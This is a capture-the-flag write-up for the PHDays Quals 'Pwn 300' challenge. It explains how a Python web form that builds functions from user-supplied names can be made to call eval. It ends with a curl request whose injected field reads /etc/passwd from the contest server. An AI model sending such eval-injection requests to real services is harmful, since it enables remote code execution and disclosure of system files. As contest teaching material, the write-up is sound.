# PHDays Quals Pwn 300

PWN 300 is a 'south park administration' website.

It only has a form:

* Select between {Kenny, Stan, Kyle, Eric, Butters, Token}
* Radio buttons for {Kill, Arrest, Bankrupt}
* Submit button

Click submit, and it'll return a message like `Kenny was killed`,
depending on the input.

The html source code provides a comment, stating that **the flag is inside
of /etc/passwd**. We are also given the source code for the website.

**web.py** is a python twisted web server.
By default, it serves the main web page, which is hard coded as a
string. For POST requests, it passes the arguments from the request to a
function from the other file.

**process.pyc** is compiled python that web.py makes use of.

We decompile process.pyc to get process.py. Thanks [unpyc](http://code.google.com/p/unpyc/). There is one issue with the decompiled code. A line inside of the 'create_function' function in process.py reads: 

    consts = ((None,) + (human))

Which doesn't work. Change it so that it does what it probably was meant
to do.

    consts = tuple([None, human])

Now it is possible to run web.py locally and have the same output as the
online version.

**process.py** provides a function that dynamically builds up another
function. What it does:

* Builds up an list of information needed for a python code object.
* Passes the list into types.codeType to generate a python code object.
* Passes the python code object into types.FunctionType to create a function.
* Calls the resultant function and passes the output string back to
  web.py.

It turns out that we don't actually need to understand how python code
objects work to exploit this.

Here is the bottom of process.py, which is all that we actually need to
exploit this.

```python
def kill(name):
    return ('%s was killed' % name)

def arrest(name):
    return ('%s was arrested' % name)

def bankrupt(name):
    return ('%s was bankrupted' % name)

def process(args):
    actions = tuple(args['actions'])
    choice = args['choice'][0]
    human = args['human'][0]
    return create_function('myfunc', 0, choice, actions, human)()
```

When printed, args looks like this (depends on what the web client passes in):

    kill kenny   {'actions': ['kill', 'arrest', 'bankrupt'], 'human': ['Kenny'], 'choice': ['\x00']} 

Based on the value inside of 'choice', process.py will choose one of the
options inside of 'actions', which correspond to function names to use
in the dynamically generated function. The first value inside of 'human'
gets passed in as an argument. We can replace one of the functions with
eval. We want args to look like:

    {'actions': ['eval', 'arrest', 'bankrupt'], 'human': ['str(open("/etc/passwd"))'], 'choice': ['\x00']}

Construct a request to send in these parameters:

    $ curl -d "actions=eval&actions=arrest&human=str(open(\"/etc/passwd\").read())&choice=%00" http://ctf.phdays.com:2137

And it dumps /etc/passwd, which contains the flag in plaintext
